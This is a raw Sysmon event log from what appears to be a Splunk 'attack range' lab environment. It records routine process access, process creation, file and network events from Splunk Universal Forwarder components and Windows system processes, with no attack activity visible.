10:46:49.944{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215978Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:49.944{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-1099-6216-4004-000000003902}2964C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215977Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:49.944{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1099-6216-4004-000000003902}2964C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215976Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:49.946{4F8D34B0-1099-6216-4004-000000003902}2964C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000215975Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:49.725{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC66205A227FBD28EACFAACDEEE90CD4,SHA256=08392753EE7C540EC995D69312FE46832F3ADBCAA23EA00C8F0E1904311CCF7A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000287041Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:46.565{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53379-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000215974Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:49.538{4F8D34B0-1099-6216-3F04-000000003902}22801788C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215973Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:49.366{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1099-6216-3F04-000000003902}2280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215972Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:49.366{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215971Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:49.366{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215970Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:49.366{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215969Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:49.366{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215968Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:49.366{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215967Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:49.366{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215966Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:49.366{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215965Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:49.366{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215964Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:49.366{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215963Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:49.366{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-1099-6216-3F04-000000003902}2280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215962Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:49.366{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1099-6216-3F04-000000003902}2280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215961Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:49.367{4F8D34B0-1099-6216-3F04-000000003902}2280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000215991Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:50.788{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=347508FEE50EE5B0F5DD71523479CFBF,SHA256=56CF9126EF23509F4A89BE214DB95F8A78B40FE7FBB700603B0607D376FAD2F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287043Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:50.732{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB953D12818C11C9D94BC83B41A32B0A,SHA256=BA75881EA1F9340D09843E919EA64C8B6585CC38B555E870273CD015482C8726,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215990Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:50.429{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1C92DAA3BB63E19D228BBC50AC837B84,SHA256=A940786AFAC43D279FF7895BADB28DF5F4763E5E5D445BFAD369360893D52ACE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215989Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:50.225{4F8D34B0-1099-6216-4004-000000003902}29643852C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000287044Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:51.748{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E7B2A2DE3BB0CD430573426236A77C96,SHA256=B2642E8904C46EFCB507AAAD280812DBFBCC88E2E7910296C62462BAFE8D4D4C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216004Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:51.522{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-109B-6216-4104-000000003902}4076C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216003Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:51.522{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216002Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:51.522{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216001Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:51.522{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216000Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:51.522{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215999Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 